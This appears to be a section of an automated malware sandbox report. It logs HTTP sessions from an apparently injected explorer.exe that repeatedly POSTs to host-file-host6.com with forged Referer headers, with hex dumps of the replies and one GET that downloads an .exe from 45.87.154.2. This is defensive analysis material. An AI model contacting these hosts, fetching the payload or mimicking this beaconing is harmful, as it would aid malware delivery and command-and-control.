                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  24192.168.2.749788188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.756087065 CET5137OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://hkilsvrrd.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 291
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.855127096 CET5138INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:29 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  25192.168.2.749789188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.960937023 CET5139OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://tltympjjb.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 351
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.076189041 CET5140INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:30 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  26192.168.2.749790188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.185760021 CET5141OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://mtofyflq.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 183
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.320590973 CET5142INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:30 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  27192.168.2.749792188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.153840065 CET6608OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://ltdhgfb.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 196
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.261888027 CET6610INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:31 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  28192.168.2.749796188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.379403114 CET6612OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://eqdjygbwuq.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 179
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.494772911 CET7027INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:31 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  29192.168.2.749797188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.616314888 CET8119OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://krhxuby.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.725743055 CET8249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:31 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 95 d2 08 5f 3c 5c a1 f3 d8 fc f8 5e b2 32 8f 78 84 06 4e ba 57 ff cd 78 e9 0c 03 0e f3 a9 88 17 bd 54 d0 47 de f7 22 80 27 ed ac 9b 56 2f e6 b2 4c 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 48I:82O_<\^2xNWxTG"'V/L50


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  3192.168.2.749760188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.574858904 CET1174OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://ovnfahllse.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 195
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.696490049 CET1174INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:08 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 19{i+,GO0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  30192.168.2.74979845.87.154.280C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.760689020 CET8249OUTGET /vN1zS0qN2nD1iF6p/04805958955520964044.exe HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: 45.87.154.2
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.788234949 CET8250INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:31 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.33
                                                                                                                                                                                                  X-Powered-By: PHP/7.0.33
                                                                                                                                                                                                  Content-Length: 195
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                                                                                                                                  Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  31192.168.2.749799188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.887509108 CET9348OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://iuyisco.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 193
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.996277094 CET9349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:31 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  32192.168.2.749800188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.140680075 CET9350OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://gxapoluwf.net/
